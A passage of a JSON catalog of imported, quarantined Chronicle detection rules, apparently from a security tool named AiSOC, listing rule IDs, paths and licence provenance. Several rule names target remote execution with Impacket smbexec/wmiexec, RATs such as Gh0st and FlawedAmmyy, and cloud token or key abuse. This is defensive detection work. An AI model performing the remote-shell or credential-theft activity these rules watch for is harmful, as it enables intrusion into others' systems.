"chronicle-detection-rules-fireeye-red-team-tool-g2js-suspicious-process-tree", "type": "detection", "name": 
"fireeye_red_team_tool__g2js_suspicious_process_tree", "description": "fireeye_red_team_tool__g2js_suspicious_process_tree", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-g2js-suspicious-process-tree.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__g2js_suspicious_process_tree", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/fireeye_red_team_tool___g2js_suspicious_process_tree.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-modified-impacket-smbexec-via-cmdline", "type": "detection", "name": "fireeye_red_team_tool__modified_impacket_smbexec_via_cmdline", "description": "fireeye_red_team_tool__modified_impacket_smbexec_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-modified-impacket-smbexec-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__modified_impacket_smbexec_via_cmdline", "source_commit": "74dd490", 
"license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/fireeye_red_team_tool___modified_impacket_smbexec__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-modified-impacket-smbexec-via-registry", "type": "detection", "name": "fireeye_red_team_tool__modified_impacket_smbexec_via_registry", "description": "fireeye_red_team_tool__modified_impacket_smbexec_via_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-modified-impacket-smbexec-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__modified_impacket_smbexec_via_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/registry_event/fireeye_red_team_tool___modified_impacket_smbexec__via_registry.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-modified-impacket-wmiexec-via-cmdline", "type": "detection", "name": "fireeye_red_team_tool__modified_impacket_wmiexec_via_cmdline", "description": "fireeye_red_team_tool__modified_impacket_wmiexec_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, 
"source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-modified-impacket-wmiexec-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__modified_impacket_wmiexec_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/fireeye_red_team_tool___modified_impacket_wmiexec__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-flash-player-update-from-suspicious-location", "type": "detection", "name": "flash_player_update_from_suspicious_location", "description": "flash_player_update_from_suspicious_location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/flash-player-update-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "flash_player_update_from_suspicious_location", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/flash_player_update_from_suspicious_location.yaral" } }, { "id": "chronicle-detection-rules-flawedammyy-rat-detection-proxy", "type": "detection", "name": 
"flawedammyy_rat_detection_proxy", "description": "flawedammyy_rat_detection_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/flawedammyy-rat-detection-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "flawedammyy_rat_detection_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/flawedammyy_rat_detection__proxy.yaral" } }, { "id": "chronicle-detection-rules-flowerpippi-malware-detector-sysmon-behavior", "type": "detection", "name": "flowerpippi_malware_detector_sysmon_behavior", "description": "flowerpippi_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/flowerpippi-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "flowerpippi_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/windows/flowerpippi_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-formbook-malware-sysmon", "type": "detection", "name": "formbook_malware_sysmon", "description": "formbook_malware_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/formbook-malware-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "formbook_malware_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/formbook_malware__sysmon.yaral" } }, { "id": "chronicle-detection-rules-gcp-identity-low-and-medium-severity-alert-escalation", "type": "detection", "name": "gcp_identity_low_and_medium_severity_alert_escalation", "description": "gcp_identity_low_and_medium_severity_alert_escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcp-identity-low-and-medium-severity-alert-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcp_identity_low_and_medium_severity_alert_escalation", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/gcp_identity_low_and_medium_severity_alert_escalation.yaral" } }, { "id": "chronicle-detection-rules-gcp-kms-decryption-by-unexpected-service-account", "type": "detection", "name": "gcp_kms_decryption_by_unexpected_service_account", "description": "gcp_kms_decryption_by_unexpected_service_account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcp-kms-decryption-by-unexpected-service-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcp_kms_decryption_by_unexpected_service_account", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/gcp_kms_decryption_by_unexpected_service_account.yaral" } }, { "id": "chronicle-detection-rules-gcp-multiple-hmac-keys-deleted", "type": "detection", "name": "gcp_multiple_hmac_keys_deleted", "description": "gcp_multiple_hmac_keys_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcp-multiple-hmac-keys-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcp_multiple_hmac_keys_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/gcp_multiple_hmac_keys_deleted.yaral" } }, { "id": "chronicle-detection-rules-gcp-unauthorized-gke-pod-token-endpoint-usage", "type": "detection", "name": "gcp_unauthorized_gke_pod_token_endpoint_usage", "description": "gcp_unauthorized_gke_pod_token_endpoint_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcp-unauthorized-gke-pod-token-endpoint-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcp_unauthorized_gke_pod_token_endpoint_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/gcp_unauthorized_gke_pod_token_endpoint_usage.yaral" } }, { "id": "chronicle-detection-rules-gcti-benign-binaries-contacts-tor-exit-node", "type": "detection", "name": "gcti_benign_binaries_contacts_tor_exit_node", "description": "gcti_benign_binaries_contacts_tor_exit_node", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/gcti-benign-binaries-contacts-tor-exit-node.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcti_benign_binaries_contacts_tor_exit_node", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/gcti_benign_binaries_contacts_tor_exit_node.yaral" } }, { "id": "chronicle-detection-rules-gcti-remote-access-tools", "type": "detection", "name": "gcti_remote_access_tools", "description": "gcti_remote_access_tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcti-remote-access-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcti_remote_access_tools", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/gcti_remote_access_tools.yaral" } }, { "id": "chronicle-detection-rules-gcti-tor-exit-nodes", "type": "detection", "name": "gcti_tor_exit_nodes", "description": "gcti_tor_exit_nodes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/gcti-tor-exit-nodes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcti_tor_exit_nodes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/gcti_tor_exit_nodes.yaral" } }, { "id": "chronicle-detection-rules-gelup-malware-detector-sysmon-behavior", "type": "detection", "name": "gelup_malware_detector_sysmon_behavior", "description": "gelup_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gelup-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gelup_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/gelup_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-geoip-user-login-from-multiple-states-or-countries", "type": "detection", "name": "geoip_user_login_from_multiple_states_or_countries", "description": "geoip_user_login_from_multiple_states_or_countries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/geoip-user-login-from-multiple-states-or-countries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "geoip_user_login_from_multiple_states_or_countries", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/authentication/geoip_user_login_from_multiple_states_or_countries.yaral" } }, { "id": "chronicle-detection-rules-gh0strat-malware-detector-sysmon-behavior-july-2019", "type": "detection", "name": "gh0strat_malware_detector_sysmon_behavior_july_2019", "description": "gh0strat_malware_detector_sysmon_behavior_july_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gh0strat-malware-detector-sysmon-behavior-july-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gh0strat_malware_detector_sysmon_behavior_july_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/gh0strat_malware_detector__sysmon_behavior___july_2019.yaral" } }, { "id": 
"chronicle-detection-rules-github-access-granted-to-personal-access-token-followed-by-high-number-of-cloned", "type": "detection", "name": "github_access_granted_to_personal_access_token_followed_by_high_number_of_cloned_non_public_repositories", "description": "github_access_granted_to_personal_access_token_followed_by_high_number_of_cloned_non_public_repositories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-access-granted-to-personal-access-token-followed-by-high-number-of-cloned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_access_granted_to_personal_access_token_followed_by_high_number_of_cloned_non_public_repositories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_access_granted_to_personal_access_token_followed_by_high_number_of_cloned_non_public_repositories.yaral" } }, { "id": "chronicle-detection-rules-github-application-installed", "type": "detection", "name": "github_application_installed", "description": "github_application_installed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-application-installed.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_application_installed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_application_installed.yaral" } }, { "id": "chronicle-detection-rules-github-dependabot-vulnerability-alerts-disabled", "type": "detection", "name": "github_dependabot_vulnerability_alerts_disabled", "description": "github_dependabot_vulnerability_alerts_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-dependabot-vulnerability-alerts-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_dependabot_vulnerability_alerts_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_dependabot_vulnerability_alerts_disabled.yaral" } }, { "id": "chronicle-detection-rules-github-enterprise-audit-log-stream-destroyed", "type": "detection", "name": "github_enterprise_audit_log_stream_destroyed", "description": "github_enterprise_audit_log_stream_destroyed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", 
"enabled": false, "path": "detections/chronicle-imports/_quarantine/github-enterprise-audit-log-stream-destroyed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_enterprise_audit_log_stream_destroyed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_enterprise_audit_log_stream_destroyed.yaral" } }, { "id": "chronicle-detection-rules-github-enterprise-audit-log-stream-modified", "type": "detection", "name": "github_enterprise_audit_log_stream_modified", "description": "github_enterprise_audit_log_stream_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-enterprise-audit-log-stream-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_enterprise_audit_log_stream_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_enterprise_audit_log_stream_modified.yaral" } }, { "id": "chronicle-detection-rules-github-enterprise-deleted", "type": "detection", "name": "github_enterprise_deleted", "description": "github_enterprise_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-enterprise-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_enterprise_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_enterprise_deleted.yaral" } }, { "id": "chronicle-detection-rules-github-enterprise-or-organization-recovery-codes-activity", "type": "detection", "name": "github_enterprise_or_organization_recovery_codes_activity", "description": "github_enterprise_or_organization_recovery_codes_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-enterprise-or-organization-recovery-codes-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_enterprise_or_organization_recovery_codes_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_enterprise_or_organization_recovery_codes_activity.yaral" } }, { "id": "chronicle-detection-rules-github-high-number-of-non-public-github-repositories-cloned", "type": "detection", "name": 
"github_high_number_of_non_public_github_repositories_cloned", "description": "github_high_number_of_non_public_github_repositories_cloned", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-high-number-of-non-public-github-repositories-cloned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_high_number_of_non_public_github_repositories_cloned", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_high_number_of_non_public_github_repositories_cloned.yaral" } }, { "id": "chronicle-detection-rules-github-high-number-of-non-public-github-repositories-downloaded", "type": "detection", "name": "github_high_number_of_non_public_github_repositories_downloaded", "description": "github_high_number_of_non_public_github_repositories_downloaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-high-number-of-non-public-github-repositories-downloaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_high_number_of_non_public_github_repositories_downloaded", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_high_number_of_non_public_github_repositories_downloaded.yaral" } }, { "id": "chronicle-detection-rules-github-invitation-sent-to-non-company-email-domain", "type": "detection", "name": "github_invitation_sent_to_non_company_email_domain", "description": "github_invitation_sent_to_non_company_email_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-invitation-sent-to-non-company-email-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_invitation_sent_to_non_company_email_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_invitation_sent_to_non_company_email_domain.yaral" } }, { "id": "chronicle-detection-rules-github-oauth-application-access-restrictions-disabled", "type": "detection", "name": "github_oauth_application_access_restrictions_disabled", "description": "github_oauth_application_access_restrictions_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/github-oauth-application-access-restrictions-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_oauth_application_access_restrictions_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_oauth_application_access_restrictions_disabled.yaral" } }, { "id": "chronicle-detection-rules-github-organization-removed-from-enterprise", "type": "detection", "name": "github_organization_removed_from_enterprise", "description": "github_organization_removed_from_enterprise", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-organization-removed-from-enterprise.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_organization_removed_from_enterprise", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_organization_removed_from_enterprise.yaral" } }, { "id": "chronicle-detection-rules-github-outgoing-organization-transfer-initiated", "type": "detection", "name": "github_outgoing_organization_transfer_initiated", "description": "github_outgoing_organization_transfer_initiated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 
], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-outgoing-organization-transfer-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_outgoing_organization_transfer_initiated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_outgoing_organization_transfer_initiated.yaral" } }, { "id": "chronicle-detection-rules-github-outgoing-repository-transfer-initiated", "type": "detection", "name": "github_outgoing_repository_transfer_initiated", "description": "github_outgoing_repository_transfer_initiated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-outgoing-repository-transfer-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_outgoing_repository_transfer_initiated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_outgoing_repository_transfer_initiated.yaral" } }, { "id": 
